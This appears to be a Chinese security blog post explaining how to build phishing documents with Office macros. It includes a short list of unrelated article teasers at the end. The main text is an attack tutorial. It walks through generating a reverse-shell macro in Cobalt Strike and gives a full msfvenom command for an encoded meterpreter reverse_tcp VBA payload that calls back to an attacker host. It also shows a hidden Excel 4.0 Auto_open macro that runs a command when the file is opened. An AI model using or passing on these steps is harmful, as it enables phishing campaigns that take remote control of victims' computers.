钓鱼邮件之office宏攻击

VSole2021-11-03 06:38:44

前言

office宏攻击是钓鱼邮件场景中最常见的攻击手段,其制作简单,兼容性强,非常适合批量攻击,但由于其需要用户交互,隐蔽性差,攻击能否成功基本取决于目标的安全意识强弱。

宏病毒

office宏病毒一般寄存于office文档中,如word,excel,ppt,以excel最常见,当用户打开这种文档时,内置的宏命令就会执行,在计算机中执行恶意命令。

一般的恶意命令会自动访问提前部署好的恶意服务器下载木马程序到本地并运行,从而控制计算机。

攻击示例

CobaltStrike生成office宏病毒

使用CobaltStrike的宏病毒生成功能可以轻松生成恶意宏代码,部署CobaltStrike服务器并打开客户端,创建一个监听器

然后点击Attacks-Package-MS Office Macro-选定监听器-生成对应的宏病毒-复制到剪贴板

然后创建一个新word-视图-查看宏中新建一个宏名

在里面粘贴刚才复制的宏,并在保存时点击否另存为.doxm文件

当打开word文档并点击启用宏代码时,就会触发宏,反弹shell到Cobalt Strike中

msf生成vba文件

使用msf生成vba文件:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=xx.xx.xx.xx lport=4444 -f vba -o 123.vba

后面的步骤与CobaltStrike中相似,创建一个新word-视图-查看宏中新建一个宏名

在里面粘贴刚才复制的宏,并在保存时点击否另存为.doxm文件

当打开word文档并点击启用宏代码时,就会触发宏,反弹shell到msf中

使用excel4.0宏执行命令

创建一个word或excel文档,如果是word需要插入excel工作表

右键点击底部的sheet-插入,选择MS Excel 4.0宏表

在表格中写入= EXEC(“calc.exe”)

点击此格,将单元格命名为Auto_open,并可以将此sheet右键隐藏,重新打开word文档将会自动执行命令。

在excel中嵌入宏代码

excel中可以直接嵌入dde指令,参考csv注入中的攻击方式即可。

参考文档:http://uuzdaisuki.com/2020/07/16/csv%E6%B3%A8%E5%85%A5%E5%88%A9%E7%94%A8%E5%92%8C%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/

电子表格钓鱼邮件
本作品采用《CC 协议》,转载必须注明作者和本文链接
退税补贴诈骗新手段!
近年来,网络钓鱼电子邮件越来越普遍,也越来越难检测。事实上,网络钓鱼是 2020年最常见的在线欺诈类型,有近
退税补贴诈骗新手段
出于财务动机的黑客组织FIN11已经开始传播勒索软件,以将其网络犯罪活动货币化。在最近的攻击中,观察到该组织将Clop勒索软件部署到其受害者的网络中。FireEye的Mandiant的研究人员观察到FIN11黑客使用鱼叉式网络钓鱼消息分发了名为FRIENDSPEAK的恶意软件下载器。专家指出,丢弃了Clop勒索软件之后的FIN11参与者在失去访问权限后并没有放弃目标,至少在一种情况下,几个月后他们再次破坏了目标组织。
据广东省通信管理局网站消息,广东省通信管理局5月12日发布了《关于勒索病毒对关键信息基础设施威胁的预警通报》。例如在 2020 年的 8 月和 11 月,多家传统企业就先后遭到勒索病毒的攻击,勒索团伙均要求企业支付高额赎金,否则将把盗窃数据在暗网出售。从勒索病毒感染的行业来看,数据价值较高的传统行业、医疗、政府机关遭受攻击较为严重,依次占比为37%、18%、14%,总计占比高达69%。
病毒很有耐心的逐步扩散,一点一点的进行破坏。Duqu主要收集工业控制系统的情报数据和资产信息,为攻击者提供下一步攻击的必要信息。夜龙攻击 夜龙攻击是McAfee在2011年2月份发现并命名的针对全球主要能源公司的攻击行为。
用户名:加密密码:密码最后一次修改日期:两次密码的修改时间间隔:密码有效期:密码修改到期到的警告天数:密码过期之后的宽限天数:账号失效时间:保留。查看下pid所对应的进程文件路径,
当前,以数字经济为代表的新经济成为经济增长新引擎,数据作为核心生产要素成为了基础战略资源,数据安全的基础保障作用也日益凸显。伴随而来的数据安全风险与日俱增,数据泄露、数据滥用等安全事件频发,为个人隐私、企业商业秘密、国家重要数据等带来了严重的安全隐患。近年来,国家对数据安全与个人信息保护进行了前瞻性战略部署,开展了系统性的顶层设计。《中华人民共和国数据安全法》于2021年9月1日正式施行,《中华人
“我们观察到恶意行为者在诸如 Google Sites,Box 和 Quip(在本例中)之类的合法服务上托管网络钓鱼页面的持续趋势。” “这些服务大多数都具有免费版本,并且易于使用,这使它们对世界各地的数百万人都是有益的,但不幸的是,这也降低了网络犯罪分子发起成功的网络钓鱼攻击的门槛。”
VSole
网络安全专家